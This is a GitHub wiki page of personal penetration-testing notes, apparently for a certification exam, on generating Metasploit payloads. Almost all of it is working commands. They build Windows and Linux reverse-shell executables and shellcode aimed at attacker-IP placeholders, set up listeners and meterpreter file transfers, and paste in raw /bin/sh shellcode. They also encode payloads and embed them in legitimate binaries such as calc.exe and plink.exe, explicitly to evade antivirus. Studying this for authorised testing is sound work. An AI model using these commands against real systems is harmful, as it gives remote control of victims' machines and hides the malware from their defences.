-
Notifications
You must be signed in to change notification settings - Fork 14
msf payloads
lethanhtung01011980 edited this page Apr 22, 2020
·
26 revisions
- To create MSF payloads
- Allowed in exam
- Web full shell: https://github.com/lethanhtung01011980/Notes/wiki/Create-reverse-shell-payload
- To avoid AV: https://github.com/inquisb/shellcodeexec/blob/master/README.md
We told msfencode that we took care of finding the shellcodes absolute address and we saved it in the register
To avoid bad characters
-b "\x00\x0a\x0d\x20"
msfvenom -p linux/x86/shell_reverse_tcp LPORT=4444 -f python -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
- Default in MSF is staged payload.
- List payload:
msfvenom -l payload
- To filter payload:
msfvenom -l payload | grep linux | grep shell_reverse_tcp
- To list format:
msfvenom -l format
- sessions 1
- shell
Non-staged: Payload in one go. windows/shell_reverse_tcp
- nc -lnvp
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_ip LPORT=5678 -f python -o shell_reverse_nonstaged.py
Staged: Payload in two parts. windows/shell/reverse_tcp
- Use multi-handler: here
msfvenom -p windows/shell/reverse_tcp LHOST=attacker_ip LPORT=5678 -f python -o shell_reverse_staged.py
For Windows
- windows/x64/shell_reverse_tcp
- windows/shell_reverse_tcp
For Linux
- linux/x64/shell_reverse_tcp
- linux/x86/shell_reverse_tcp
- linux/x64/shell/reverse_tcp
- linux/x86/shell/reverse_tcp
- WIndows:
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_ip LPORT=5678 -f python -o shell_reverse_nonstaged.py
- Linux:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=attacker_ip LPORT=5678 -f python -o shell_reverse_nonstaged.py
- -f python,c...
- Payload to execute command:
msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)
- https://www.exploit-db.com/exploits/34060
- "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
- "\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
- "\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
- "\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
- "\x89\xe3\x31\xc9\xcd\x80"
Windows
- Windows x86:
msfvenom -p windows/shell_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port EXITFUNC=thread -f exe -a x86 --platform windows -o win_shell_reverse_nonstaged.exe
- Windows x64:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port EXITFUNC=thread -f exe -a x64 --platform windows -o win_shell_reverse_nonstaged.exe
Linux
- Linux x86: `msfvenom -p linux/x86/shell_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port EXITFUNC=thread -f elf -o linux_shell_reverse_nonstaged
- Linux x64: `msfvenom -p linux/x64/shell_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port EXITFUNC=thread -f elf -o linux_shell_reverse_nonstaged
- Must use
\\
:meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
- Can use double quote or
\\
:download "c:\Windows\system32\calc.exe" /tmp/calc.exe
To avoid AV detection
msfvenom -p windows/shell_reverse_tcp LHOST=attacker-ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
msfvenom -p windows/shell_reverse_tcp LHOST=attacker-ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x calc.exe -o shell_reverse_msf_encoded_embedded.exe